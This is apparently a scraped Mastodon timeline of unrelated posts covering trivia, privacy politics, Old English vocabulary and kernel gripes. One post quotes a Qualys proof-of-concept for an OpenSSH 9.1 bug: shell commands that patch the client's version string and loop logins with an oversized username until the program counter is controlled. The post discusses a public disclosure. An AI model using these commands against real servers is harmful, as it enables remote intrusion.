Show newer

Just wrote my most evil Unix hack of the year, it's horrible but it's easier than a proper implementation, and this should be enough for a quick test script...

This post by the Qualys Security Advisory team demonstrating rip/pc control on OpenSSH 9.1 (running on OpenBSD!) is savage: seclists.org/oss-sec/2023/q1/9

Here I was thinking this bug was hopeless and they one-line it without writing new code:

$ cp -i /usr/bin/ssh ./ssh

$ sed -i s/OpenSSH_9.1/FuTTYSH_9.1/g ./ssh

$ user=`perl -e 'print "A" x 300'` && while true ;do ./ssh -o NumberOfPasswordPrompts=0 -o Ciphers=aes128-ctr -l
"$user:$user" 192.168.56.123 ;done

...

#1 0x4141414141414141 in ?? ()

wait until the politicians freaking out about tiktok realize Chinese intelligence can easily purchase entire mental health histories thanks to the oversight-optional data hoovering hellscape they created by opposing FTC enforcement and privacy legislation.

won't they feel silly.

washingtonpost.com/technology/

a-brecan, str.v: to break, vanquish, to take by storm, to assault, destroy. (ah-BREH-kahn / a-ˈbrɛ-kan)

The three horizontal black lines on the side of a school bus are there for emergency responders. In an emergency where the doors and windows can't be opened and they need to cut into the bus, the lines show the positions of the floor boards, the bottom ...
huffpost.com/entry/school-bus-

Original tweet : nitter.privacydev.net/tilbots/

I don't know who need to hear this, but as a reminder- abuse of the legal system _is_ a thing and _is_ recognized in court.

en.m.wikipedia.org/wiki/Catego

Example:::
Vexatious litigation is legal action which is brought solely to harass or subdue an adversary. It may take the form of a primary frivolous lawsuit or may be the repetitive, burdensome, and unwarranted filing of meritless motions in a matter which is otherwise a meritorious cause of action. Filing vexatious litigation is considered an abuse of the judicial process and may result in sanctions against the offender.

RT @mhdksafa
The 7 year old girl who kept her hand on her little brother's head to protect him while they were under the rubble for 17 hours has made it safely. I see no one sharing. If she were dead, everyone would share! Share positivity...

Dear Qualcomm kernel developers,

User namespaces exist. PID namespaces exist. Don't just assume you can left-shift arbitrary IDs in the kernel by 16 bits and be fine with whatever you get.

Thanks.

Just got done rewatching the docudrama. Still a great watch the n-th time around.

How to tell some one to 'fuck around and find out' but with some class.

Again, didn't feel like cooking. So I just threw together some reheated white rice, Hamburger with onion, and some shredded cheese. It's a similar combination to some burrito fillings.

On a side note, I'm also catching up on season 2.

ears-endu, m.n: buttocks. (AY-arz-EN-duh / ˈɛarz-ˌɛn-dʌ)
Image: Jacobus de Voragine’s Legenda Aurea; France, 14th century; Angers, Bibliothèque municipale, ms. 808, f. 88v.

Show older
Qoto Mastodon

QOTO: Question Others to Teach Ourselves
An inclusive, Academic Freedom, instance
All cultures welcome.
Hate speech and harassment strictly forbidden.